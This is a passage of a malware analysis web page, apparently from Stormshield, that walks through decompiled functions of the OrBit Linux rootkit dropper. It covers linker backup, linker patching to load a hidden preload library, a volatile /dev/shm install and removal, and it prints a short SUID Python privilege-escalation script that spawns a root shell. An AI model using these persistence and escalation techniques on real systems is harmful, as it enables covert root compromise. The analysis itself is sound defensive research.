	<div class="wpb_single_image wpb_content_element vc_align_center">
		<div class="wpb_wrapper">
			
			<div class="vc_single_image-wrapper   vc_box_border_grey"><img width="535" height="411" src="data:image/svg+xml,%3Csvg%20xmlns='http://www.w3.org/2000/svg'%20viewBox='0%200%20535%20411'%3E%3C/svg%3E" class="vc_single_image-img attachment-large" alt="" decoding="async" title="orbit-capture-1-en" data-lazy-srcset="https://www.stormshield.com/wp-content/uploads/orbit-capture-1-en.png 535w, https://www.stormshield.com/wp-content/uploads/orbit-capture-1-en-300x230.png 300w" data-lazy-sizes="(max-width: 535px) 100vw, 535px" data-lazy-src="https://www.stormshield.com/wp-content/uploads/orbit-capture-1-en.png" /><noscript><img width="535" height="411" src="https://www.stormshield.com/wp-content/uploads/orbit-capture-1-en.png" class="vc_single_image-img attachment-large" alt="" decoding="async" title="orbit-capture-1-en" srcset="https://www.stormshield.com/wp-content/uploads/orbit-capture-1-en.png 535w, https://www.stormshield.com/wp-content/uploads/orbit-capture-1-en-300x230.png 300w" sizes="(max-width: 535px) 100vw, 535px" /></noscript></div>
		</div>
	</div>
</div></div></div></div></div><div      class="vc_row wpb_row section vc_row-fluid " style=' text-align:left;'><div class=" full_section_inner clearfix"><div class="wpb_column vc_column_container vc_col-sm-12"><div class="vc_column-inner"><div class="wpb_wrapper">
	<div class="wpb_text_column wpb_content_element ">
		<div class="wpb_wrapper">
			<h4>Backup of the linker</h4>
<p>The program then calls the <strong><code>backup_ld</code></strong> function, as its name suggests, this function makes a backup of the dynamic linker present on the machine.</p>

		</div> 
	</div> 	<div class="vc_empty_space"  style="height: 32px" ><span
			class="vc_empty_space_inner">
			<span class="empty_space_image"  ></span>
		</span></div>

</div></div></div></div></div><div      class="vc_row wpb_row section vc_row-fluid " style='background-color:#ececec; padding-top:30px; padding-bottom:30px; text-align:left;'><div class=" full_section_inner clearfix" style='padding: 0% 10%'><div class="wpb_column vc_column_container vc_col-sm-12"><div class="vc_column-inner"><div class="wpb_wrapper">
	<div class="wpb_text_column wpb_content_element ">
		<div class="wpb_wrapper">
			<pre><strong>backup_ld() - Linker backup
</strong>readlink("/lib64/ld-linux-x86-64.so.2", dest);
/* ... */
<strong>sprintf</strong>(src, "cp %s /lib/libntpVnQE6mk/.backup_ld.so", dest);
return (<strong>system</strong>(src));</pre>

		</div> 
	</div> </div></div></div></div></div><div      class="vc_row wpb_row section vc_row-fluid " style=' text-align:left;'><div class=" full_section_inner clearfix"><div class="wpb_column vc_column_container vc_col-sm-12"><div class="vc_column-inner"><div class="wpb_wrapper">
	<div class="wpb_text_column wpb_content_element ">
		<div class="wpb_wrapper">
			<p>On a 64-bit Linux system, the symbolic link <em><code>/lib64/ld-linux-x86-64.so.2</code></em> points to the dynamic linker binary.</p>
<p>The malware obtains the path to the linker through this symbolic link and copies it to the location <em><code>/lib/libntpVnQE6mk/.backup_ld.so</code>.</em></p>

		</div> 
	</div> </div></div></div></div></div><div      class="vc_row wpb_row section vc_row-fluid " style=' text-align:left;'><div class=" full_section_inner clearfix"><div class="wpb_column vc_column_container vc_col-sm-12"><div class="vc_column-inner"><div class="wpb_wrapper">
	<div class="wpb_single_image wpb_content_element vc_align_center">
		<div class="wpb_wrapper">
			
			<div class="vc_single_image-wrapper   vc_box_border_grey"><img width="1024" height="520" src="data:image/svg+xml,%3Csvg%20xmlns='http://www.w3.org/2000/svg'%20viewBox='0%200%201024%20520'%3E%3C/svg%3E" class="vc_single_image-img attachment-large" alt="" decoding="async" title="orbit-capture-2-en" data-lazy-srcset="https://www.stormshield.com/wp-content/uploads/orbit-capture-2-en-1024x520.png 1024w, https://www.stormshield.com/wp-content/uploads/orbit-capture-2-en-300x152.png 300w, https://www.stormshield.com/wp-content/uploads/orbit-capture-2-en-768x390.png 768w, https://www.stormshield.com/wp-content/uploads/orbit-capture-2-en-700x356.png 700w, https://www.stormshield.com/wp-content/uploads/orbit-capture-2-en.png 1315w" data-lazy-sizes="(max-width: 1024px) 100vw, 1024px" data-lazy-src="https://www.stormshield.com/wp-content/uploads/orbit-capture-2-en-1024x520.png" /><noscript><img width="1024" height="520" src="https://www.stormshield.com/wp-content/uploads/orbit-capture-2-en-1024x520.png" class="vc_single_image-img attachment-large" alt="" decoding="async" title="orbit-capture-2-en" srcset="https://www.stormshield.com/wp-content/uploads/orbit-capture-2-en-1024x520.png 1024w, https://www.stormshield.com/wp-content/uploads/orbit-capture-2-en-300x152.png 300w, https://www.stormshield.com/wp-content/uploads/orbit-capture-2-en-768x390.png 768w, https://www.stormshield.com/wp-content/uploads/orbit-capture-2-en-700x356.png 700w, https://www.stormshield.com/wp-content/uploads/orbit-capture-2-en.png 1315w" sizes="(max-width: 1024px) 100vw, 1024px" /></noscript></div>
		</div>
	</div>
</div></div></div></div></div><div      class="vc_row wpb_row section vc_row-fluid " style=' text-align:left;'><div class=" full_section_inner clearfix"><div class="wpb_column vc_column_container vc_col-sm-12"><div class="vc_column-inner"><div class="wpb_wrapper">
	<div class="wpb_text_column wpb_content_element ">
		<div class="wpb_wrapper">
			<h4 id="OrbitEN-Creationofthemaliciousdynamiclibrary">Creation of the malicious dynamic library</h4>
<p>The malware then introduces a malicious shared library with the <strong><code>load_ld</code></strong> function which takes as parameter the destination path of this library.<br />
A check is performed on the version of the linker, it has a name like <code>ld-${LIBC_VERSION}.so</code>, which means that each libc version brings a new linker.</p>
<p>If the version is lower than 2.4 (before September 2006), then the check fails unless you use the <em><strong><code>-O</code></strong></em>  option on the command line.</p>
<p>The path passed in parameter is then created.</p>

		</div> 
	</div> 	<div class="vc_empty_space"  style="height: 32px" ><span
			class="vc_empty_space_inner">
			<span class="empty_space_image"  ></span>
		</span></div>

</div></div></div></div></div><div      class="vc_row wpb_row section vc_row-fluid " style='background-color:#ececec; padding-top:30px; padding-bottom:30px; text-align:left;'><div class=" full_section_inner clearfix" style='padding: 0% 10%'><div class="wpb_column vc_column_container vc_col-sm-12"><div class="vc_column-inner"><div class="wpb_wrapper">
	<div class="wpb_text_column wpb_content_element ">
		<div class="wpb_wrapper">
			<pre><strong>load_ld() - Check of the linker version
</strong>stream = popen("ls -l /lib64/ld-linux-x86-64.so.2", "r");
<strong>fread</strong>(buffer, 1, 255, stream);
/* ... */
ld_version = <strong>strstr</strong>(buffer, "ld-2.");
if (ld_version) {
    if (ld_version[5] &lt;= '4' &amp;&amp; ld_version[6] == '.') {
        <strong>printf</strong>("ld error: %s\n", buffer);
        return override_version != 0;
    } else {
        return (1):
    }
} else {
    <strong>printf</strong>("ld: %s\n", buffer);
    return (0);
}</pre>

		</div> 
	</div> </div></div></div></div></div><div      class="vc_row wpb_row section vc_row-fluid " style=' text-align:left;'><div class=" full_section_inner clearfix"><div class="wpb_column vc_column_container vc_col-sm-12"><div class="vc_column-inner"><div class="wpb_wrapper">
	<div class="wpb_text_column wpb_content_element ">
		<div class="wpb_wrapper">
			<p>Two symbols are then used to fill the file:</p>
<ul>
<li><strong><code>rkld_so</code></strong> whose first 4 bytes (<code>7F 45 4C 46</code>) are the signature of an executable binary under Linux: this is where the malicious library of the malware is located.</li>
<li><strong><code>rkld_so_len</code></strong> which contains the size of the malicious library.</li>
</ul>

		</div> 
	</div> 	<div class="vc_empty_space"  style="height: 32px" ><span
			class="vc_empty_space_inner">
			<span class="empty_space_image"  ></span>
		</span></div>

</div></div></div></div></div><div      class="vc_row wpb_row section vc_row-fluid " style='background-color:#ececec; padding-top:30px; padding-bottom:30px; text-align:left;'><div class=" full_section_inner clearfix" style='padding: 0% 10%'><div class="wpb_column vc_column_container vc_col-sm-12"><div class="vc_column-inner"><div class="wpb_wrapper">
	<div class="wpb_text_column wpb_content_element ">
		<div class="wpb_wrapper">
			<pre><strong>load_ld() - Creation of the malicious library</strong>
unlink(a1);
fd = open(...);
write(fd, &amp;rkld_so, rkld_so_len);
fchown(fd, 0, 920366);
close(fd);
return (build_root());</pre>

		</div> 
	</div> </div></div></div></div></div><div      class="vc_row wpb_row section vc_row-fluid " style=' text-align:left;'><div class=" full_section_inner clearfix"><div class="wpb_column vc_column_container vc_col-sm-12"><div class="vc_column-inner"><div class="wpb_wrapper">
	<div class="wpb_text_column wpb_content_element ">
		<div class="wpb_wrapper">
			<p>Being one of the files associated with the malware, it is assigned the group ID <strong>920366</strong>.</p>

		</div> 
	</div> </div></div></div></div></div><div      class="vc_row wpb_row section vc_row-fluid " style=' text-align:left;'><div class=" full_section_inner clearfix"><div class="wpb_column vc_column_container vc_col-sm-12"><div class="vc_column-inner"><div class="wpb_wrapper">
	<div class="wpb_single_image wpb_content_element vc_align_center">
		<div class="wpb_wrapper">
			
			<div class="vc_single_image-wrapper   vc_box_border_grey"><img width="826" height="737" src="data:image/svg+xml,%3Csvg%20xmlns='http://www.w3.org/2000/svg'%20viewBox='0%200%20826%20737'%3E%3C/svg%3E" class="vc_single_image-img attachment-large" alt="" decoding="async" title="orbit-capture-3-en" data-lazy-srcset="https://www.stormshield.com/wp-content/uploads/orbit-capture-3-en.png 826w, https://www.stormshield.com/wp-content/uploads/orbit-capture-3-en-300x268.png 300w, https://www.stormshield.com/wp-content/uploads/orbit-capture-3-en-768x685.png 768w, https://www.stormshield.com/wp-content/uploads/orbit-capture-3-en-700x625.png 700w" data-lazy-sizes="(max-width: 826px) 100vw, 826px" data-lazy-src="https://www.stormshield.com/wp-content/uploads/orbit-capture-3-en.png" /><noscript><img width="826" height="737" src="https://www.stormshield.com/wp-content/uploads/orbit-capture-3-en.png" class="vc_single_image-img attachment-large" alt="" decoding="async" title="orbit-capture-3-en" srcset="https://www.stormshield.com/wp-content/uploads/orbit-capture-3-en.png 826w, https://www.stormshield.com/wp-content/uploads/orbit-capture-3-en-300x268.png 300w, https://www.stormshield.com/wp-content/uploads/orbit-capture-3-en-768x685.png 768w, https://www.stormshield.com/wp-content/uploads/orbit-capture-3-en-700x625.png 700w" sizes="(max-width: 826px) 100vw, 826px" /></noscript></div>
		</div>
	</div>
</div></div></div></div></div><div      class="vc_row wpb_row section vc_row-fluid " style=' text-align:left;'><div class=" full_section_inner clearfix"><div class="wpb_column vc_column_container vc_col-sm-12"><div class="vc_column-inner"><div class="wpb_wrapper">
	<div class="wpb_text_column wpb_content_element ">
		<div class="wpb_wrapper">
			<h4 id="OrbitEN-Creationofutilityfiles">Creation of utility files</h4>
<p>Once the library is on the system, the malware will build a directory and file tree that will be useful when the malicious library is used.</p>
<p>The two files placed in <em><code>/lib/libntpVnQE6mk/bin</code></em> stand out:</p>
<ul>
<li><code><strong>python</strong></code> which is the copy of the python interpreter bcy adding a SUID bit to it.</li>
<li>A python script stored in base64 in the binary that is used to elevate the privileges of a user.</li>
</ul>
<p align="justify">Finally, the <code><em>.l</em></code> is added and the malicious library path is written to it (<em><code>/lib/libntpVnQE6mk/libdl.so</code></em>).</p>

		</div> 
	</div> </div></div></div></div></div><div      class="vc_row wpb_row section vc_row-fluid " style=' text-align:left;'><div class=" full_section_inner clearfix"><div class="wpb_column vc_column_container vc_col-sm-12"><div class="vc_column-inner"><div class="wpb_wrapper">
	<div class="wpb_single_image wpb_content_element vc_align_center">
		<div class="wpb_wrapper">
			
			<div class="vc_single_image-wrapper   vc_box_border_grey"><img width="744" height="727" src="data:image/svg+xml,%3Csvg%20xmlns='http://www.w3.org/2000/svg'%20viewBox='0%200%20744%20727'%3E%3C/svg%3E" class="vc_single_image-img attachment-large" alt="" decoding="async" title="orbit-capture-4-en" data-lazy-srcset="https://www.stormshield.com/wp-content/uploads/orbit-capture-4-en.png 744w, https://www.stormshield.com/wp-content/uploads/orbit-capture-4-en-300x293.png 300w, https://www.stormshield.com/wp-content/uploads/orbit-capture-4-en-700x684.png 700w" data-lazy-sizes="(max-width: 744px) 100vw, 744px" data-lazy-src="https://www.stormshield.com/wp-content/uploads/orbit-capture-4-en.png" /><noscript><img width="744" height="727" src="https://www.stormshield.com/wp-content/uploads/orbit-capture-4-en.png" class="vc_single_image-img attachment-large" alt="" decoding="async" title="orbit-capture-4-en" srcset="https://www.stormshield.com/wp-content/uploads/orbit-capture-4-en.png 744w, https://www.stormshield.com/wp-content/uploads/orbit-capture-4-en-300x293.png 300w, https://www.stormshield.com/wp-content/uploads/orbit-capture-4-en-700x684.png 700w" sizes="(max-width: 744px) 100vw, 744px" /></noscript></div>
		</div>
	</div>
</div></div></div></div></div><div      class="vc_row wpb_row section vc_row-fluid " style=' text-align:left;'><div class=" full_section_inner clearfix"><div class="wpb_column vc_column_container vc_col-sm-12"><div class="vc_column-inner"><div class="wpb_wrapper">
	<div class="wpb_text_column wpb_content_element ">
		<div class="wpb_wrapper">
			<h4 id="OrbitEN-Linkermodificationandreplacement">Linker modification and replacement</h4>
<p align="justify">The last function called to finish the installation of the malware is <strong><code>patch_ld</code></strong>  which will allow the malicious library to be used instead of the classic libraries.</p>
<p align="justify">In the same way as for the backup seen previously, the program, thanks to the symbolic link <em><code>/lib64/ld-linux-x86-64.so.2</code></em>, then copies the original linker to <em><code>/lib/lib0UZ0LfvWZ.so</code>.</em></p>
<p align="justify">This file is then opened and mapped in memory to search for the string <em><code>/etc/ld.so.preload</code></em> and replace it by <em><code>/lib/libntpVnQE6mk/.l</code></em>  (see precision part).</p>
<p align="justify">The program then changes the location of the copy of the linker to that of the original linker, so that every time the program is run, the modified copy of the linker is used.</p>

		</div> 
	</div> </div></div></div></div></div><div      class="vc_row wpb_row section vc_row-fluid " style=' text-align:left;'><div class=" full_section_inner clearfix"><div class="wpb_column vc_column_container vc_col-sm-12"><div class="vc_column-inner"><div class="wpb_wrapper">
	<div class="wpb_single_image wpb_content_element vc_align_center">
		<div class="wpb_wrapper">
			
			<div class="vc_single_image-wrapper   vc_box_border_grey"><img width="861" height="733" src="data:image/svg+xml,%3Csvg%20xmlns='http://www.w3.org/2000/svg'%20viewBox='0%200%20861%20733'%3E%3C/svg%3E" class="vc_single_image-img attachment-large" alt="" decoding="async" title="orbit-capture-5-en" data-lazy-srcset="https://www.stormshield.com/wp-content/uploads/orbit-capture-5-en.png 861w, https://www.stormshield.com/wp-content/uploads/orbit-capture-5-en-300x255.png 300w, https://www.stormshield.com/wp-content/uploads/orbit-capture-5-en-768x654.png 768w, https://www.stormshield.com/wp-content/uploads/orbit-capture-5-en-700x596.png 700w" data-lazy-sizes="(max-width: 861px) 100vw, 861px" data-lazy-src="https://www.stormshield.com/wp-content/uploads/orbit-capture-5-en.png" /><noscript><img width="861" height="733" src="https://www.stormshield.com/wp-content/uploads/orbit-capture-5-en.png" class="vc_single_image-img attachment-large" alt="" decoding="async" title="orbit-capture-5-en" srcset="https://www.stormshield.com/wp-content/uploads/orbit-capture-5-en.png 861w, https://www.stormshield.com/wp-content/uploads/orbit-capture-5-en-300x255.png 300w, https://www.stormshield.com/wp-content/uploads/orbit-capture-5-en-768x654.png 768w, https://www.stormshield.com/wp-content/uploads/orbit-capture-5-en-700x596.png 700w" sizes="(max-width: 861px) 100vw, 861px" /></noscript></div>
		</div>
	</div>
</div></div></div></div></div><div      class="vc_row wpb_row section vc_row-fluid " style=' text-align:left;'><div class=" full_section_inner clearfix"><div class="wpb_column vc_column_container vc_col-sm-12"><div class="vc_column-inner"><div class="wpb_wrapper">
	<div class="wpb_text_column wpb_content_element ">
		<div class="wpb_wrapper">
			<h3 id="OrbitEN-Volatileinstallation">Volatile installation</h3>
<h4 id="OrbitEN-Entrypointofthemalware">Entry point of the malware</h4>
<p align="justify">Using <em><strong>sh</strong></em> on the command line, the program will install the shared library in the <em><code>/dev/shm/ldx</code></em> directory.</p>
<p align="justify">This directory is not really a directory, it is a tree representation of the shared memory system(<strong>SH</strong>ared <strong>M</strong>emory) which is a way to communicate between different processes (e.g. during a fork).</p>
<p align="justify">The data present is erased as soon as the user disconnects from the machine.</p>
<h4 id="OrbitEN-Installationfunction">Installation function</h4>
<p align="justify">The <strong><code>rkload_shm</code></strong>  function is then called, which performs all the necessary steps to deploy the malware.</p>
<p>The temporary installation is very similar to the persistent installation:</p>
<ul>
<li>The creation of the <em><code>/dev/shm/ldx</code></em>  directory avec 920366 as the group ID</li>
<li>The creation a backup of the linker  (<em><code>/dev/shm/ldx/.backdup_ld.so</code></em>)</li>
<li>The modification of the linker with the <strong><code>patch_ld</code></strong><code> </code>patch_ld function</li>
<li>A call to <code><strong>load_ld</strong></code> which places the malicious library in <em><code>/dev/shm/ldx/libdl.so</code></em></li>
<li>The creation of the file <em><code>/dev/shm/ldx/.l</code></em> which contains the path of the previously created library</li>
</ul>

		</div> 
	</div> 	<div class="vc_empty_space"  style="height: 32px" ><span
			class="vc_empty_space_inner">
			<span class="empty_space_image"  ></span>
		</span></div>

</div></div></div></div></div><div      class="vc_row wpb_row section vc_row-fluid " style='background-color:#ececec; padding-top:30px; padding-bottom:30px; text-align:left;'><div class=" full_section_inner clearfix" style='padding: 0% 10%'><div class="wpb_column vc_column_container vc_col-sm-12"><div class="vc_column-inner"><div class="wpb_wrapper">
	<div class="wpb_text_column wpb_content_element ">
		<div class="wpb_wrapper">
			<pre><strong>rkload_shm() - Volatile installation</strong>
<strong>system</strong>("mkdir /dev/shm/ldx");
chown("/dev/shm/ldx", 0, 920366);
<strong>system</strong>("cp -p %s /dev/shm/ldx/.backup_ld.so"); //erreur
patch_ld(1, 1);
load_ld("/dev/shm/ldx/libdl.so");
fd = open(...);
write(fd, "/dev/shm/ldx/libdl.so\n", 22);
return (close(fd));</pre>

		</div> 
	</div> </div></div></div></div></div><div      class="vc_row wpb_row section vc_row-fluid " style=' text-align:left;'><div class=" full_section_inner clearfix"><div class="wpb_column vc_column_container vc_col-sm-12"><div class="vc_column-inner"><div class="wpb_wrapper">
	<div class="wpb_text_column wpb_content_element ">
		<div class="wpb_wrapper">
			<p>The line <code><strong>system("cp -p %s /dev/shm/ldx/.backup_ld.so");</strong></code> is bound to fail because the system function does not support string formats (<strong><em>"%s"</em></strong>) and the path to the original linker is never recovered.</p>
<p>The volatile installation therefore modifies the linker without being able to retrieve the original.</p>
<h3 id="OrbitEN-Manualmodificationofthelinker">Manual modification of the linker</h3>
<p>With <strong><em>newpath</em></strong>, the program offers the possibility to choose the file path to be modified in the linker via  <strong><code>swap_ldpath</code></strong> function.</p>
<p>The linker pointed by the symbolic link <code><em>/lib64/ld-linux-x86-64.so.2</em></code> is copied to <em><code>/lib/lib0UZ0LfvWZ.so</code></em> and searches in the file for the string passed in the 1st argument of the program to replace it by the string passed in the 2nd argument.</p>
<p>This function is similar to  <code><strong>patch_ld</strong></code> function,  the process is the same if the following arguments are passed on the command line: <strong><em><code>/etc/ld.so.preload /lib/libntpVnQE6mk/.l</code></em></strong></p>
<p>Two ways of using this capability can be distinguished:</p>
<ol>
<li>If the malware is already installed, the corrupted linker can be changed to point to another file.</li>
<li>If the malware is not installed, the attacker may want to use another library and different directories or files than those proposed in the classic installation, the dropper is then only used to modify the linker.</li>
</ol>

		</div> 
	</div> </div></div></div></div></div><div      class="vc_row wpb_row section vc_row-fluid " style=' text-align:left;'><div class=" full_section_inner clearfix"><div class="wpb_column vc_column_container vc_col-sm-12"><div class="vc_column-inner"><div class="wpb_wrapper">
	<div class="wpb_single_image wpb_content_element vc_align_center">
		<div class="wpb_wrapper">
			
			<div class="vc_single_image-wrapper   vc_box_border_grey"><img width="944" height="686" src="data:image/svg+xml,%3Csvg%20xmlns='http://www.w3.org/2000/svg'%20viewBox='0%200%20944%20686'%3E%3C/svg%3E" class="vc_single_image-img attachment-large" alt="" decoding="async" title="orbit-capture-6-en" data-lazy-srcset="https://www.stormshield.com/wp-content/uploads/orbit-capture-6-en.png 944w, https://www.stormshield.com/wp-content/uploads/orbit-capture-6-en-300x218.png 300w, https://www.stormshield.com/wp-content/uploads/orbit-capture-6-en-768x558.png 768w, https://www.stormshield.com/wp-content/uploads/orbit-capture-6-en-700x509.png 700w" data-lazy-sizes="(max-width: 944px) 100vw, 944px" data-lazy-src="https://www.stormshield.com/wp-content/uploads/orbit-capture-6-en.png" /><noscript><img width="944" height="686" src="https://www.stormshield.com/wp-content/uploads/orbit-capture-6-en.png" class="vc_single_image-img attachment-large" alt="" decoding="async" title="orbit-capture-6-en" srcset="https://www.stormshield.com/wp-content/uploads/orbit-capture-6-en.png 944w, https://www.stormshield.com/wp-content/uploads/orbit-capture-6-en-300x218.png 300w, https://www.stormshield.com/wp-content/uploads/orbit-capture-6-en-768x558.png 768w, https://www.stormshield.com/wp-content/uploads/orbit-capture-6-en-700x509.png 700w" sizes="(max-width: 944px) 100vw, 944px" /></noscript></div>
		</div>
	</div>
</div></div></div></div></div><div      class="vc_row wpb_row section vc_row-fluid " style=' text-align:left;'><div class=" full_section_inner clearfix"><div class="wpb_column vc_column_container vc_col-sm-12"><div class="vc_column-inner"><div class="wpb_wrapper">
	<div class="wpb_text_column wpb_content_element ">
		<div class="wpb_wrapper">
			<h3 id="OrbitEN-Reset">Reset</h3>
<p>With the <em><strong>-u</strong></em> argument passed on the command line, the program calls the <strong><code>rkld_update</code></strong> function.</p>
<p>This function retrieves the path to the current installation of the malicious library and reinstalls it with <code><strong>load_ld</strong></code>.</p>

		</div> 
	</div> 	<div class="vc_empty_space"  style="height: 32px" ><span
			class="vc_empty_space_inner">
			<span class="empty_space_image"  ></span>
		</span></div>

</div></div></div></div></div><div      class="vc_row wpb_row section vc_row-fluid " style='background-color:#ececec; padding-top:30px; padding-bottom:30px; text-align:left;'><div class=" full_section_inner clearfix" style='padding: 0% 10%'><div class="wpb_column vc_column_container vc_col-sm-12"><div class="vc_column-inner"><div class="wpb_wrapper">
	<div class="wpb_text_column wpb_content_element ">
		<div class="wpb_wrapper">
			<pre><strong>rkld_update() - Recovery of the installation path</strong>
if (stat("/lib/libntpVnQE6mk/libdl.so", v1)) {
    if (!stat("/dev/shm/ldx/libdl.so", v1))
        lib_path = "/dev/shm/ldx/libdl.so";
} else {
    lib_path = "/lib/libntpVnQE6mk/libdl.so";
}
return (load_ld(lib_path));</pre>

		</div> 
	</div> </div></div></div></div></div><div      class="vc_row wpb_row section vc_row-fluid " style=' text-align:left;'><div class=" full_section_inner clearfix"><div class="wpb_column vc_column_container vc_col-sm-12"><div class="vc_column-inner"><div class="wpb_wrapper">
	<div class="wpb_text_column wpb_content_element ">
		<div class="wpb_wrapper">
			<p>We can note an unmanaged case, summarized by the diagram below:</p>

		</div> 
	</div> </div></div></div></div></div><div      class="vc_row wpb_row section vc_row-fluid " style=' text-align:left;'><div class=" full_section_inner clearfix"><div class="wpb_column vc_column_container vc_col-sm-12"><div class="vc_column-inner"><div class="wpb_wrapper">
	<div class="wpb_single_image wpb_content_element vc_align_center">
		<div class="wpb_wrapper">
			
			<div class="vc_single_image-wrapper   vc_box_border_grey"><img width="1024" height="244" src="data:image/svg+xml,%3Csvg%20xmlns='http://www.w3.org/2000/svg'%20viewBox='0%200%201024%20244'%3E%3C/svg%3E" class="vc_single_image-img attachment-large" alt="" decoding="async" title="OrBit - capture 7" data-lazy-srcset="https://www.stormshield.com/wp-content/uploads/orbit-capture-7-1024x244.png 1024w, https://www.stormshield.com/wp-content/uploads/orbit-capture-7-300x72.png 300w, https://www.stormshield.com/wp-content/uploads/orbit-capture-7-768x183.png 768w, https://www.stormshield.com/wp-content/uploads/orbit-capture-7-1536x367.png 1536w, https://www.stormshield.com/wp-content/uploads/orbit-capture-7-1396x333.png 1396w, https://www.stormshield.com/wp-content/uploads/orbit-capture-7-700x167.png 700w, https://www.stormshield.com/wp-content/uploads/orbit-capture-7.png 1571w" data-lazy-sizes="(max-width: 1024px) 100vw, 1024px" data-lazy-src="https://www.stormshield.com/wp-content/uploads/orbit-capture-7-1024x244.png" /><noscript><img width="1024" height="244" src="https://www.stormshield.com/wp-content/uploads/orbit-capture-7-1024x244.png" class="vc_single_image-img attachment-large" alt="" decoding="async" title="OrBit - capture 7" srcset="https://www.stormshield.com/wp-content/uploads/orbit-capture-7-1024x244.png 1024w, https://www.stormshield.com/wp-content/uploads/orbit-capture-7-300x72.png 300w, https://www.stormshield.com/wp-content/uploads/orbit-capture-7-768x183.png 768w, https://www.stormshield.com/wp-content/uploads/orbit-capture-7-1536x367.png 1536w, https://www.stormshield.com/wp-content/uploads/orbit-capture-7-1396x333.png 1396w, https://www.stormshield.com/wp-content/uploads/orbit-capture-7-700x167.png 700w, https://www.stormshield.com/wp-content/uploads/orbit-capture-7.png 1571w" sizes="(max-width: 1024px) 100vw, 1024px" /></noscript></div>
		</div>
	</div>
</div></div></div></div></div><div      class="vc_row wpb_row section vc_row-fluid " style=' text-align:left;'><div class=" full_section_inner clearfix"><div class="wpb_column vc_column_container vc_col-sm-12"><div class="vc_column-inner"><div class="wpb_wrapper">
	<div class="wpb_text_column wpb_content_element ">
		<div class="wpb_wrapper">
			<h3>Deleting</h3>
<p>To remove the corrupted linker, the program supports the <em><strong>shred</strong></em> hat causes a call to the <strong><code>unload_ld</code></strong> function.</p>
<p>In this function, the file <em><code>/lib/libntpVnQE6mk/.l</code></em> is deleted and the original linker backup replaces the modified linker at the location pointed to by the symbolic link <em><code>/lib64/ld-linux-x86-64.so.2</code>.</em></p>
<p>&nbsp;</p>
<h2>Clarification on the elevation of privilege script</h2>
<p>The escalator file has theSUID bbit of the root user, so in theory executing the<strong><em> </em><code>execv</code></strong> function should open a bash shell with root rights (0:0).</p>
<p>It is however necessary to add the <strong><code>setreuid</code></strong> function before <strong><code>execv</code></strong>.</p>

		</div> 
	</div> 	<div class="vc_empty_space"  style="height: 32px" ><span
			class="vc_empty_space_inner">
			<span class="empty_space_image"  ></span>
		</span></div>

</div></div></div></div></div><div      class="vc_row wpb_row section vc_row-fluid " style='background-color:#ececec; padding-top:30px; padding-bottom:30px; text-align:left;'><div class=" full_section_inner clearfix" style='padding: 0% 10%'><div class="wpb_column vc_column_container vc_col-sm-12"><div class="vc_column-inner"><div class="wpb_wrapper">
	<div class="wpb_text_column wpb_content_element ">
		<div class="wpb_wrapper">
			<pre><strong>escalator</strong>
import os
os.setreuid(0, 0)
os.execv("/bin/bash", ("/bin/bash", "-i"))</pre>

		</div> 
	</div> </div></div></div></div></div><div      class="vc_row wpb_row section vc_row-fluid " style=' text-align:left;'><div class=" full_section_inner clearfix"><div class="wpb_column vc_column_container vc_col-sm-12"><div class="vc_column-inner"><div class="wpb_wrapper">
	<div class="wpb_text_column wpb_content_element ">
		<div class="wpb_wrapper">
			<p align="justify">To understand why, we must first talk about the identifiers. In a Linux system, each user has an identifier, these are visible in the <code><em>/etc/passwd</em></code> file. This identifier is the real id (<strong>ruid</strong>). There is also an effective id which has the same value as the real id most of the time.</p>
<p align="justify">When running a program with the <strong>bit SUID</strong> set, a user will only have his effective id changed to the value of the file owner's, which means that the real id remains the same.</p>
<p align="justify">But when a shell is run, if the effective id is different from the real id then the shell takes the real id as reference and removes the privileges granted by the <strong>SUID bit</strong>.</p>
<p align="justify">Thus, in the case of the python script, the user would not be root once <em><strong>/bin/bash</strong></em> is launched. To remedy this problem, the <code><strong>setreuid</strong></code> function is called before the execution of the command. This function allows to change directly the real id if the effective id allows it. This way <em><strong>/bin/bash</strong></em> is run with a real id and an effective id of 0 (root).</p>

		</div> 
	</div> </div></div></div></div></div><div      class="vc_row wpb_row section vc_row-fluid " style=' text-align:left;'><div class=" full_section_inner clearfix"><div class="wpb_column vc_column_container vc_col-sm-12"><div class="vc_column-inner"><div class="wpb_wrapper">
	<div class="wpb_single_image wpb_content_element vc_align_center">
		<div class="wpb_wrapper">
			
			<div class="vc_single_image-wrapper   vc_box_border_grey"><img width="663" height="417" src="data:image/svg+xml,%3Csvg%20xmlns='http://www.w3.org/2000/svg'%20viewBox='0%200%20663%20417'%3E%3C/svg%3E" class="vc_single_image-img attachment-large" alt="" decoding="async" title="OrBit - capture 8" data-lazy-srcset="https://www.stormshield.com/wp-content/uploads/orbit-capture-8.png 663w, https://www.stormshield.com/wp-content/uploads/orbit-capture-8-300x189.png 300w" data-lazy-sizes="(max-width: 663px) 100vw, 663px" data-lazy-src="https://www.stormshield.com/wp-content/uploads/orbit-capture-8.png" /><noscript><img width="663" height="417" src="https://www.stormshield.com/wp-content/uploads/orbit-capture-8.png" class="vc_single_image-img attachment-large" alt="" decoding="async" title="OrBit - capture 8" srcset="https://www.stormshield.com/wp-content/uploads/orbit-capture-8.png 663w, https://www.stormshield.com/wp-content/uploads/orbit-capture-8-300x189.png 300w" sizes="(max-width: 663px) 100vw, 663px" /></noscript></div>
		</div>
	</div>
</div></div></div></div></div><div      class="vc_row wpb_row section vc_row-fluid " style=' text-align:left;'><div class=" full_section_inner clearfix"><div class="wpb_column vc_column_container vc_col-sm-12"><div class="vc_column-inner"><div class="wpb_wrapper">
	<div class="wpb_text_column wpb_content_element ">
		<div class="wpb_wrapper">
			<h2 id="OrbitEN-Clarificationonthedynamiclinker">Clarification on the dynamic linker</h2>
<p>A binary under Linux can be compiled in a static or dynamic way.</p>
<p>In static mode, the program contains all the libraries necessary for it to function properly and can be executed directly.</p>
<p>In dynamic mode, the dependencies are not added to the binary but stored as symbols.</p>
<p>During its execution, the dynamic linker searches for symbols in a list of shared libraries and loads the necessary libraries into memory.</p>
<p>Finally, the dynamic linker matches the symbols of the program with the functions either before the execution of the program or when a function is called.</p>
<p>The order in which the libraries are loaded in memory is predefined but it is possible to load libraries in priority:</p>
<ul>
<li>With the <strong><code>LD_PRELOAD</code></strong> environment variable<em><strong><br />
</strong></em></li>
<li>With the <code><em>/etc/ld.so.preload</em></code> file</li>
</ul>
<p>The latter is only supposed to exist for testing purposes and is therefore absent by default on a production system. We find in the source code the definition of the string used to open this file.</p>

		</div> 
	</div> 	<div class="vc_empty_space"  style="height: 32px" ><span
			class="vc_empty_space_inner">
			<span class="empty_space_image"  ></span>
		</span></div>

